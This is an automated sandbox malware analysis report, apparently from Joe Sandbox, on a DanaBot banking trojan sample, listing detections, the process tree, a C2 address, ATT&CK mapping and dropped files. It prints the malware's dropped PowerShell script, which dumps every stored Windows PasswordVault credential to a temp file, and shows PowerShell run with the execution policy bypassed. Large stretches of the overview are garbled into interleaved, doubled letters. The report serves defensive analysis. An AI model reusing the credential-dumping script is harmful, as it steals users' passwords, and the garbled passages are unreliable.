ID: 453837 Sample Name: X4xY5J1GWc.exe Cookbook: default.jbs Time: 08:27:20 Date: 25/07/2021 Version: 33.0.0 White Diamond Table of Contents

Table of Contents 2 Windows Analysis Report X4xY5J1GWc.exe 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Process Tree 4 Malware Configuration 4 Threatname: DanaBot 4 Yara Overview 4 Dropped Files 4 Sigma Overview 5 System Summary: 5 Jbx Signature Overview 5 AV Detection: 5 Compliance: 5 Networking: 5 E-Banking Fraud: 5 Spam, unwanted Advertisements and Ransom Demands: 5 System Summary: 5 Data Obfuscation: 5 Malware Analysis System Evasion: 5 HIPS / PFW / Operating System Protection Evasion: 6 Stealing of Sensitive Information: 6 Remote Access Functionality: 6 Mitre Att&ck Matrix 6 Behavior Graph 6 Screenshots 7 Thumbnails 7 Antivirus, Machine Learning and Genetic Malware Detection 8 Initial Sample 8 Dropped Files 8 Unpacked PE Files 8 Domains 8 URLs 8 Domains and IPs 9 Contacted Domains 9 Contacted URLs 9 URLs from Memory and Binaries 9 Contacted IPs 9 Public 9 Private 9 General Information 9 Simulations 10 Behavior and APIs 10 Joe Sandbox View / Context 10 IPs 10 Domains 10 ASN 10 JA3 Fingerprints 11 Dropped Files 11 Created / dropped Files 11 Static File Info 14 General 14 File Icon 14 Static PE Info 14 General 14 Entrypoint Preview 14 Data Directories 14 Sections 15 Resources 15 Imports 15 Version Infos 15 Possible Origin 15 Network Behavior 15 Network Port Distribution 15 TCP Packets 15 UDP Packets 15 DNS Queries 15 DNS Answers 15 Code Manipulations 15 Statistics 15 Behavior 16 Copyright Joe Security LLC 2021 Page 2 of 19 System Behavior 16 Analysis Process: X4xY5J1GWc.exe PID: 6644 Parent PID: 5920 16 General 16 File Activities 16 File Created 16 File Written 16 Analysis Process: rundll32.exe PID: 6712 Parent PID: 6644 16 General 16 File Activities 16 Analysis Process: rundll32.exe PID: 7140 Parent PID: 6712 16 General 17 File Activities 17 File Created 17 File Written 17 File Read 17 Registry Activities 17 Key Value Created 17 Key Value Modified 17 Analysis Process: powershell.exe PID: 6764 Parent PID: 7140 17 General 17 File Activities 17 File Created 17 File Deleted 17 File Written 17 File Read 17 Analysis Process: conhost.exe PID: 6568 Parent PID: 6764 17 General 18 Analysis Process: powershell.exe PID: 5484 Parent PID: 7140 18 General 18 File Activities 18 File Created 18 File Read 18 Analysis Process: conhost.exe PID: 5548 Parent PID: 5484 18 General 18 Disassembly 18 Code Analysis 19

Copyright Joe Security LLC 2021 Page 3 of 19 Windows Analysis Report X4xY5J1GWc.exe

Overview

General Information Detection Signatures Classification

Sample X4xY5J1GWc.exe Name: DDeettteeccttteedd uunnppaacckkiiinngg (((cchhaannggeess PPEE ssee…

Analysis ID: 453837 DDeettteeccttteedd uunnppaacckkiiinngg (((ocovhveaerrnrwwgrreriiittstee sPs Eiiittts ss oeo… MD5: ab4cf6181cfb102… FDFooeuutenncddt e mda aulllwwnapararreec kccionongnff fii(iggouuvrrreaartttwiiioornnites its o SHA1: Ransomware ac756cbff2887e8… Found malware configuration MFouuullltttniii dAA VmV SaSlcwcaaannrnene ecrrr o ddneeftittgeeucctrttiiaiootnino ffnfoorrr ddrrroopppp… Miner Spreading SHA256: f7c566ca7413a12… Muullltttiii AAVV SSccaannnneerrr ddeettteecctttiiioonn fffoorrr sdsuruobbpmp mmaallliiiccciiioouusss Muullltttiii AAVV SSccaannnneerrr ddeettteecctttiiioonn fffoorrr ssuubbm… malicious

Tags: DanaBot exe Evader Phishing sssuusssppiiiccciiioouusss SMSyyusslttteie AmV pp Srrroocccaeenssnsse crc oodnnennteeccttttisos ntttoo f onnree stttwwuobormrr… suspicious

cccllleeaann

Infos: clean YSYayarsrraate ddmee tttpeerccottteceedds DDs aacnnoaanBBnoeottct stssttte etaoal llenerrer dtdwllllllor Exploiter Banker

BYByayprpaa ssdsseeetses c PPteoodww eDerrraSSnhhaeeBllllllo eet xxseeteccuautltteiiioorn nd plploolll… Most interesting Screenshot:

Spyware Trojan / Bot DanaBot CBC2y2p UUaRsRsLLesss // / P IIIPPosws feffooruSunnhdde liilin ne mxeaaclllwuwtaaiorrrene cpcoonln… Adware

Score: 100 ECEn2na aUbblRlleeLss s aa / ppIPrrroosxx yfyo fuffoonrrr d ttth hinee miiinntatteelwrrrnnaeerttet e ecxxoppnlll… Range: 0 - 100 MEnaaaccbhhliiiennsee aLL eepaarorrrnnxiiyinn gfgo drd eethttteecc itttniiiootennr fnffooerrrt sseaaxmplpp… Whitelisted: false QMuauecerrhriiieiensse s sLeeennassriiitnttiiivivneeg n ndeeetttwtweoocrrtrkiko anad dfaoaprp ttsteearrr m iiinnp… Confidence: 100% SQSeeutttessr aiae spp rrrsooexxnyys ffifotoirvrr ettthh neee iiitnnwttteoerrrnkne eattt d eeaxxppptlleloorrrr eeinrrr

SSiieiggtms aa dpdereotttexecyctt tefeoddr:: : t ShSueus sipnpitiiceciirioonuuesst SeSxccprrriilipopttrt eEEr… Process Tree TSTrririgiieemss a ttto od hehataerrrvcveteessdttt : a aSnnudds ssptttieecaiaolll u bbsrrro oSwwcssreieprrrt iiiEnn… CTCrooiennstttaa tiiionn ssh faffuurnvncecttstiiioto nananalldliiittt yys tttteooa ddl ybynnroaawmsiiicecaar llllillyny…

System is w10x64 CCoonntttaaiiinnss fffuunncctttiiioonnaallliiitttyy tttoo qdquyuenerarryym CCicPPaUUlly … X4xY5J1GWc.exe (PID: 6644 cmdline: 'C:\Users\user\Desktop\X4xY5J1GWc.exe' MD5: AB4CF6181CFB102EC86C66D56AF2D229) CCoonntttaaiiinnss fffuunncctttiiioonnaallliiitttyy tttoo qquueerrryy llCloocPcaaUllle e… rundll32.exe (PID: 6712 cmdline: C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\X4XY5J~1.TMP,S C:\Users\user\Desktop\X4XY5J~1.EXE MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) CCoonntttaaiiinnss fffuunncctttiiioonnaallliiitttyy tttoo rrqreeuaaeddr y ttth hloeec PPaElEeBB rundll32.exe (PID: 7140 cmdline: C:\Windows\system32\RUNDLL32.EXE C:\Users\user\Desktop\X4XY5J~1.TMP,Z0sc MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) powershell.exe (PID: 6764 cmdline: 'C:\Windows\System32\WindowsPowerShCCeoollnn\vttta1aii.inn0ss\p llflouonwngcge t rsisolllehneeaepllpli.stsey x( ((t>>eo='= r - e3E3a xmde iicintnhu)))eti oPnEpBolicy bypass -File 'C:\Users\user\AppData\Local\T emp\tmpD845.tmp.ps1' MD5: DBA3E6449E97D4E3DF64527EF7012A10) CCrroreenaattatteeinss s aa l oppnrrrogoc cseelsesses piiinns ss(u>us=sp p3ee nmnddiened)d moo… conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) powershell.exe (PID: 5484 cmdline: 'C:\Windows\System32\WindowsPowerShDCDeerelelttt\eaevc1tcettt.ee0sd d\ap p popoowrtttoeecnrnsetttiihsiaaselll lcicln.rrrey ysxppuetttos'o p- ffEfueuxnnecdccttetiiuiodotn nimonopolicy bypass -File 'C:\Users\user\AppData\Local\T emp\tmpA617.tmp.ps1' MD5: DBA3E6449E97D4E3DF64527EF7012A10) DDrrerootpepscs t PePdEE p fffiioillleetessntial crypto function conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xfffDDffrfrfoof pp-sFs o PPrEcEe ffViille1es sMD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup EDEnrnoaapbbslllee Pss E dd eefiblbeuusgg pprrriiivviiillleeggeess

EExnxttateebnnlsesiisivv eed euubssueeg oo pfff rGiveeilttetPPgrrreoosccAAddddrrreessss (((oo…

FEFoxoutuennndds aiav ehh iiiuggshhe nn ouufm GbbeeetrrPr oorofff cWAiiidnnddrooewws s /// U(Uoss… Malware Configuration FFoouunndd papo ohttteiegnnhttti iianallul smstttrrrbiiinneggr oddfee Wccrrryiynppdtttioiioownn /// aUa…s IIFIPPo auadndddr rrpeeossstse snseteieaenln s iiintnr i cncogon ndnneeecccrttytiiiopontni o wwniii ttt/hh a oo…

Threatname: DanaBot IIInPnttt eearrrdnndeerttte PPsrsrroo svveiiiddeeenrrr isnsee ceeonnn iinine ccootinonnne ewccttititiiohon no…

IIIsns t llelooroonkkeiiintn gPg rfffoovrrr i sdsoeoffrfttt wwseaaerrreen iiinnss ctttaaolllnllleendde ocotnnio tttnhh…

{ MIsa aloyy o sskllleieneegpp f (o((eerv vsaaossfitiivwveea lrllooeoo ipnpss))t) a tttolole hhdiiin noddnee rtrrh … "C2 list": [ May sleep (evasive loops) to hinder "142.11.244.124:443" PMPEEa y fffii illsleel e cceoopnn tt(taaeiiivnnasss ssiveeecc tttliioioonnpsss ww) iitittothh h nnionondn--e-ssr… ], PPEE fffiiilllee ccoonntttaaiiinnss ssttetrrracatnnioggnees rr rewessitoohuu nrrrccoeenss-s "Embedded Hash": "6AD9FE4F9E491E785665E0D144F61DAB" } QPEuue efrirrliiiee ssc ottthhneeta vvinoosllluu smtreea niiinngfffoeor rrrmeasaotttiiiouonrnc (e((nnsaam…

SQSaaumerppielllees eethxxee ccvuuotttliiiuoomnn esst ttoionppfoss r wmwhhaiiitllleieo npp rrr(oonccaeem…

SSaampplllee ffefiiillxleee iicissu ddtiiioiffffffnee rrrseetnonttpt ttsthh awannh ioloerrri iigpgiirinnoaacllel … Yara Overview USUsasemessp 3l3e22 bfbiiliitett P PisEE d fffiiiflllefeessrent than original UUsseess M32iiicbcrrrioto sPsooEffft tt'f''ssil e EEsnnhhaanncceedd CCrrryypptttoogg…

Dropped Files UUsseess cMcooidcdereo osobobfffutu'ss ccEaantttiihiooannn tttceeeccdhh nnCiiiqrqyuupeetsos g(((…

Uses code obfuscation techniques ( Source Rule Description Author Strings C:\Users\user\Desktop\X4XY5J~1.EXE.tmp JoeSecurity_DanaBot_stea Yara detected Joe Security ler_dll_1 DanaBot stealer dll

Copyright Joe Security LLC 2021 Page 4 of 19 Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Non Interactive PowerShell

Jbx Signature Overview

Click to jump to signature section

AV Detection:

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DanaBot stealer dll

Machine Learning detection for sample

Compliance:

Detected unpacking (overwrites its own PE header)

Networking:

C2 URLs / IPs found in malware configuration

E-Banking Fraud:

Yara detected DanaBot stealer dll

Sets a proxy for the internet explorer

Spam, unwanted Advertisements and Ransom Demands:

Enables a proxy for the internet explorer

Sets a proxy for the internet explorer

System Summary:

Data Obfuscation:

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Copyright Joe Security LLC 2021 Page 5 of 19 HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Bypasses PowerShell execution policy

Stealing of Sensitive Information:

Yara detected DanaBot stealer dll

Tries to harvest and steal browser information (history, passwords, etc)

Remote Access Functionality:

Yara detected DanaBot stealer dll

Mitre Att&ck Matrix

Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Windows Application Application Deobfuscate/Decode OS System Time Remote Archive Exfiltration Encrypted Eavesdrop on Accounts Management Shimming 1 Shimming 1 Files or Information 1 Credential Discovery 1 Services Collected Over Other Channel 2 2 Insecure Instrumentation 1 Dumping 1 Data 1 1 Network Network Medium Communication Default Native API 1 Boot or Process Obfuscated Files or LSASS File and Directory Remote Man in the Exfiltration Non- Exploit SS7 to Accounts Logon Injection 1 1 2 Information 3 Memory Discovery 3 Desktop Browser 2 Over Application Redirect Phone Initialization Protocol Bluetooth Layer Calls/SMS Scripts Protocol 1 Domain PowerShell 1 Logon Script Logon Script Software Security System Information SMB/Windows Data from Automated Application Exploit SS7 to Accounts (Windows) (Windows) Packing 2 2 Account Discovery 4 7 Admin Shares Local Exfiltration Layer Track Device Manager System 1 Protocol 1 2 Location

Local At (Windows) Logon Script Logon Script Masquerading 1 NTDS Security Software Distributed Input Scheduled Protocol SIM Card Accounts (Mac) (Mac) Discovery 2 1 Component Capture Transfer Impersonation Swap Object Model Cloud Cron Network Network Logon Virtualization/Sandbox LSA Process SSH Keylogging Data Fallback Manipulate Accounts Logon Script Script Evasion 1 2 1 Secrets Discovery 1 2 Transfer Channels Device Size Limits Communication

Replication Launchd Rc.common Rc.common Process Cached Virtualization/Sandbox VNC GUI Input Exfiltration Multiband Jamming or Through Injection 1 1 2 Domain Evasion 1 2 1 Capture Over C2 Communication Denial of Removable Credentials Channel Service Media External Scheduled Task Startup Startup Items Rundll32 1 DCSync Application Window Windows Web Portal Exfiltration Commonly Rogue Wi-Fi Remote Items Discovery 1 Remote Capture Over Used Port Access Points Services Management Alternative Protocol Drive-by Command and Scheduled Scheduled Indicator Removal Proc Remote System Shared Credential Exfiltration Application Downgrade to Compromise Scripting Task/Job Task/Job from Tools Filesystem Discovery 1 Webroot API Over Layer Protocol Insecure Interpreter Hooking Symmetric Protocols Encrypted Non-C2 Protocol

Behavior Graph

Copyright Joe Security LLC 2021 Page 6 of 19 Hide Legend Behavior Graph ID: 453837 Sample: X4xY5J1GWc.exe Legend: Startdate: 25/07/2021 Architecture: WINDOWS Score: 100 Process Signature localhost 8.8.8.8.in-addr.arpa

started Created File

Multi AV Scanner detection Multi AV Scanner detection Found malware configuration 4 other signatures for dropped file for submitted file DNS/IP Info Is Dropped X4xY5J1GWc.exe

1 Is Windows Process

dropped Number of created Registry Values

C:\Users\user\Desktop\X4XY5J~1.EXE.tmp, PE32 Number of created Files started

Detected unpacking (changes Detected unpacking (overwrites PE section rights) its own PE header) Visual Basic

Delphi rundll32.exe

2 Java .Net C# or VB.NET 142.11.244.124, 443, 49720, 49733

HOSTWINDSUS United States C, C++ or other language

started Is malicious Queries sensitive network adapter information Bypasses PowerShell (via WMI, Win32_NetworkAdapter, execution policy often done to detect virtual machines) Internet

rundll32.exe

10 22

127.0.0.1 unknown dropped unknown

C:\Users\user\AppData\...\tmpD845.tmp.ps1, ASCII started started

System process connects Tries to harvest and to network (likely due steal browser information Sets a proxy for the Enables a proxy for to code injection or (history, passwords, internet explorer the internet explorer exploit) etc)

powershell.exe powershell.exe

16 5

started started

conhost.exe conhost.exe

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Copyright Joe Security LLC 2021 Page 7 of 19 Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source Detection Scanner Label Link X4xY5J1GWc.exe 41% Virustotal Browse X4xY5J1GWc.exe 100% Joe Sandbox ML

Dropped Files

Source Detection Scanner Label Link C:\Users\user\Desktop\X4XY5J~1.EXE.tmp 33% ReversingLabs Win32.Trojan.Wacatac

Unpacked PE Files

Source Detection Scanner Label Link Download 0.3.X4xY5J1GWc.exe.29a0000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File

Domains

No Antivirus matches

URLs

Source Detection Scanner Label Link pesterbdd.com/images/Pester.png 0% URL Reputation safe

Copyright Joe Security LLC 2021 Page 8 of 19 Source Detection Scanner Label Link 142.11.244.124:443 0% Avira URL Cloud safe https://go.micro 0% URL Reputation safe

Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation 8.8.8.8.in-addr.arpa unknown unknown false unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation 142.11.244.124:443 true Avira URL Cloud: safe unknown

URLs from Memory and Binaries

Contacted IPs

Public

IP Domain Country Flag ASN ASN Name Malicious 142.11.244.124 unknown United States 54290 HOSTWINDSUS true

Private

IP 127.0.0.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond Analysis ID: 453837 Start date: 25.07.2021 Start time: 08:27:20 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 11m 25s Hypervisor based Inspection enabled: false Report type: light Sample file name: X4xY5J1GWc.exe Cookbook file name: default.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes 21 analysed: Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal100.bank.troj.adwa.spyw.evad.winEXE@11/10@2/2 EGA Information: Failed

Copyright Joe Security LLC 2021 Page 9 of 19 HDC Information: Successful, ratio: 83% (good quality ratio 72.1%) Quality average: 75.6% Quality standard deviation: 34.4% HCA Information: Successful, ratio: 98% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Found application associated with file extension: .exe Warnings: Show All

Simulations

Behavior and APIs

Time Type Description 08:28:22 API Interceptor 1x Sleep call for process: rundll32.exe modified 08:29:51 API Interceptor 28x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match Associated Sample Name / URL SHA 256 Detection Link Context 142.11.244.124 pAx6Ls0pm6.exe Get hash malicious Browse BVRk9asWP6.exe Get hash malicious Browse K7ApMMTwNr.exe Get hash malicious Browse rmUdUjPaZV.exe Get hash malicious Browse Lc9fv5R312.exe Get hash malicious Browse SecuriteInfo.com.W32.AIDetect.malware2.25613.exe Get hash malicious Browse FS5lCJ3vLB.exe Get hash malicious Browse mhzLXMrRjD.exe Get hash malicious Browse MaXx6Zsyj4.exe Get hash malicious Browse HCl0fpurw4.exe Get hash malicious Browse 5Wp2vuDivo.exe Get hash malicious Browse v6KB4R3tiS.exe Get hash malicious Browse pZWK8BYXwF.exe Get hash malicious Browse nN0ZQO5HOJ.exe Get hash malicious Browse VhPZlSG8Ak.exe Get hash malicious Browse jpVN8Lbg2x.exe Get hash malicious Browse Mg3Yi6MsOo.exe Get hash malicious Browse SecuriteInfo.com.W32.AIDetect.malware2.2131.exe Get hash malicious Browse 2AiZ0cWYoh.exe Get hash malicious Browse dGzO0OsUti.exe Get hash malicious Browse

Domains

No context

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context HOSTWINDSUS pAx6Ls0pm6.exe Get hash malicious Browse 142.11.244.124 BVRk9asWP6.exe Get hash malicious Browse 142.11.244.124 K7ApMMTwNr.exe Get hash malicious Browse 142.11.244.124 rmUdUjPaZV.exe Get hash malicious Browse 142.11.244.124 Iv4uSNkm1O.exe Get hash malicious Browse 108.174.19 5.201 TRINAQX4SB.exe Get hash malicious Browse 108.174.19 5.201

Copyright Joe Security LLC 2021 Page 10 of 19 Match Associated Sample Name / URL SHA 256 Detection Link Context Lc9fv5R312.exe Get hash malicious Browse 142.11.244.124 K8GW0zzZSL.exe Get hash malicious Browse 108.174.19 5.201 SecuriteInfo.com.W32.AIDetect.malware2.25613.exe Get hash malicious Browse 142.11.244.124 srK9tqOn7i.exe Get hash malicious Browse 108.174.19 5.201 FS5lCJ3vLB.exe Get hash malicious Browse 142.11.244.124 mhzLXMrRjD.exe Get hash malicious Browse 142.11.244.124 MaXx6Zsyj4.exe Get hash malicious Browse 142.11.244.124 HCl0fpurw4.exe Get hash malicious Browse 142.11.244.124 5Wp2vuDivo.exe Get hash malicious Browse 142.11.244.124 PURCHASE-ORDER.exe Get hash malicious Browse 192.236.17 9.121 v6KB4R3tiS.exe Get hash malicious Browse 142.11.244.124 476.js Get hash malicious Browse 142.11.195.33 ATT93916.HTM Get hash malicious Browse 23.254.230.117 pZWK8BYXwF.exe Get hash malicious Browse 142.11.244.124

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Jvgzbfh.tmp

Process: C:\Windows\SysWOW64\rundll32.exe File Type: data Category: modified Size (bytes): 54868208 Entropy (8bit): 7.999985812538202 Encrypted: true SSDEEP: 1572864:4S70iMLtGEIS70iMLtGEIS70iMLtGEFS70iMLtGEi:4S7N6jIS7N6jIS7N6jFS7N6ji MD5: 84FFB960D7258E934F8DAE9AB4C658EC SHA1: 5E799071A501600EFFFB47DDB9F9162D12A62957 SHA-256: F2B839FB1313D802F11759F7EBEEAB7E70D50252D1D977D8B66E643BC85BC38A SHA-512: 53A5C58ECA8011E1352769AA48B0A6D510C5C6169EC39712682D90D019A8EE7A7143586069E4C861DBB85BC8647BDEE8EF81E6E80B2127B7FD0C026A263F5A0A Malicious: false Reputation: low Preview: .....*...... ;.R.4.S...E.<.A..?...ZT.n..V..t.$.3E..'.\b.=.Q.O...... H...B..;i...... @.....(.|-....:.#...xP.:.^.:....<.W.P.UW.7.PlTq.L/'3...(C..*7 ...|h.K..C.....p#tq.HHW....@..>....u.Yel.z..3. ..D..PL..)h+...... @.S..wC..|..0.e....M|.....N.c[P.`(h.....C..:9.+..o....dSf...... K..6.v.Y.e...... }>.._?.."n...V.v.#&..{.].....G9...C [email protected]...... *?...(..M.N.|

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: dropped Size (bytes): 17808 Entropy (8bit): 5.568500012059895 Encrypted: false SSDEEP: 384:0t9a30G6GPKb08t5GCjpHYSBKn1eYaclVI4769GSJeCbG8eSyBb:+GPG0i5Y4KIYaclVVD6S MD5: C147F994C7B10EB62FE59F2AC0587BF2 SHA1: 762B179135D3A6C7CF6BA7E75DBD84B9E2B9F312 SHA-256: 8DA7EB4B0DEEFF11B8E611356365796035EE92DA4CC10BDAAE797361503960D4 SHA-512: 163047E9F72379B37B2BF9D471B7454B48E5F2E1E2CEB991671711AB6A2B68C26F948C66A69A11C8AD0A8CA2E3992F931E8B797C1982B5CFF27E52DB4CC6E336 Malicious: false Reputation: low

Copyright Joe Security LLC 2021 Page 11 of 19 C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Preview: @...e...... M...... 0.....h.8...... @...... H...... <@.^.L."My...:'...... Microsoft.PowerShell.ConsoleHostD...... fZve...F.....x.)...... System.Managemen t.Automation4...... [...{a.C..%6..h...... System.Core.0...... G-.o...A...4B...... System..4...... Zg5..:O..g..q...... System.Xml..L...... 7.....J@...... ~...... #.Microsoft.Management.Infrastructure.8...... '....L..}...... System.Numerics.@...... Lo...QN...... ..m...... Sy stem.Transactions.<...... ):gK..G...$.1.q...... System.ConfigurationP...... /.C..J..%...]...... %.Microsoft.PowerShell.Commands.Utility...D...... -.D.F.<;.nt.1 ...... System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\4708281.tmp Process: C:\Windows\SysWOW64\rundll32.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 114688 Entropy (8bit): 1.0541494269156084 Encrypted: false SSDEEP: 192:I3rHdMHGTPVbSYgbCP46w/1VumaBIy7OzlG4oNH:I3r9lgbFB/1VumaBI0olG4oN MD5: 96B99E0DED5AB6204D94A78CE1EF3D84 SHA1: E5B26C7446BE7741AE2F590C980397D41B9B7990 SHA-256: EAC19382513BFD1A2E5E42EC825F8CE21F924DB534E27DFA5F0E150DA4D50A1E SHA-512: 95D169EADBE10AE4B1C2BEF5E89B41A9D8D4F248C93AEF78AE23D127FDEA013C1D69DF1B915503098BE246FE10280F3759AD90169191880CDD2880D983FC374 A Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyi54dtc.mhf.ps1 Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irggavko.loy.psm1 Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1

C:\Users\user\AppData\Local\Temp\tmpA617.tmp.ps1 Process: C:\Windows\SysWOW64\rundll32.exe File Type: ASCII text, with no line terminators Category: dropped Size (bytes): 83 Entropy (8bit): 4.679315715874588 Encrypted: false Copyright Joe Security LLC 2021 Page 12 of 19 C:\Users\user\AppData\Local\Temp\tmpA617.tmp.ps1 SSDEEP: 3:ndgscLFvm2PN+E2J5xAILuIV:n5cxOeN723fLHV MD5: 135D884D61C5492A7586C091A98F5E58 SHA1: 06B8F23339F549164C19CCFB6F55442D2525B15D SHA-256: 9D647C8C5513DAFAFF208433596DB9E11BF2C9D5DFCD9D75874F77A7FF7C71DC SHA-512: 0D425818EC8E521C0C64449373A0B1523E8954E17059DD98C549CCFA11C72FF3FD8447C30A78BD6EE2E6CD1D45398B645A90A4BEDEA2D84DBD6467C09070B18 D Malicious: false Preview: nslookup.exe -type=any localhost > C:\Users\user\AppData\Local\Temp\tmpA618.tmp

C:\Users\user\AppData\Local\Temp\tmpD845.tmp.ps1

Process: C:\Windows\SysWOW64\rundll32.exe File Type: ASCII text, with CRLF line terminators Category: dropped Size (bytes): 264 Entropy (8bit): 5.127637790595558 Encrypted: false SSDEEP: 6:r8DYuqPwYuq4xJJS8T1YuqPmwCOsN723fy1w:r89soLfXLsIOAal MD5: 27BD405965E27D5FB409A5643FC142A0 SHA1: 24DB6EC3708214117466325E02FBB2E3941E7014 SHA-256: 690B710257CC89263C4B88A9905157EC6343B6A72968F49DC6978A3C8A1EE5DA SHA-512: AA9F9C152E3BD6ABA20190428550C24B66330B6FB764D7531D2B1EB237BEF1204DC776E55377CE424CC4B7EF57D39C61963AB8319D469CF3311DAF498A72EF56 Malicious: true Preview: [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]..(new-object Windows.Security.Credentials.P asswordVault).RetrieveAll() | % { $_.RetrievePassword(); $_ } > "C:\Users\user\AppData\Local\Temp\tmpD846.tmp"

C:\Users\user\Desktop\X4XY5J~1.EXE.tmp

Process: C:\Users\user\Desktop\X4xY5J1GWc.exe File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows Category: dropped Size (bytes): 1382912 Entropy (8bit): 6.689733051824877 Encrypted: false SSDEEP: 24576:ocFXB/GJfdFoUB8dByM/CeA+XnF0T+Taa:7R/Bz35T MD5: 279FD5BE1EF6F78DCEAEA9160797D3CA SHA1: 02D83BB9752B2F9CB205FBBA5EF084069204CE5C SHA-256: 79E7F889F4D8C8475BEF4A94124FFCDC68D1B2F8B632A6F3539179945F481477 SHA-512: 9459221CA625F4969CA4DBF68C9765F01B71D36B90CB5C0CEE863E764DA6C2FD2317581BDFDBFB0440133ED3435B90516EA36E06B20EFD1267CA22BFE34BB21 6 Malicious: true Yara Hits: Rule: JoeSecurity_DanaBot_stealer_dll_1, Description: Yara detected DanaBot stealer dll, Source: C:\Users\user\Desktop\X4XY5J~1.EXE.tmp, Author: Joe Security Antivirus: Antivirus: ReversingLabs, Detection: 33% Preview: MZP...... @...... !..L.!..This program must be run under Win32..$7...... PE..L.....`...... `...... y...... @...... `...... 0...... D...... ,e...... text....U...... V...... `.itext...... p...... Z...... `.data...... d...... @....bss.....^...... idata...... `...... @....didata...... @....edata...... @[email protected]...... @[email protected]...... @..B.rsrc....0...... 0...... @..@...... @..@......

C:\Users\user\Documents\20210725\PowerShell_transcript.116938.swg8lo9M.20210725082922.txt Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Category: dropped Size (bytes): 1046 Entropy (8bit): 5.145314916127269 Encrypted: false SSDEEP: 24:BxSAld0i7vBVLSx2DOXUWQa1WXHjeTKKjX4CIym1ZJXtC3nxSAZL:BZLFvTLSoO1cXqDYB1ZeXZZL MD5: 196282E968E31CFFB2EB0DBBDAC59BAE SHA1: F036898E810D904ED7C70CB841EFB210C54E9CE4 SHA-256: B3C57C5D6D16D1DBD9D3BC29795B2867F5CFB801AAAF6F784E8BE9B6A79302F8 SHA-512: DBC487B9FACA9A0CC396F8CB77A20E5F4E10F9A8FDC29DA356E069445D0426619E642495D3CF3C35CAD50D0C095614C0410A3429F1DD91D454D350A0F74A627 C Malicious: false

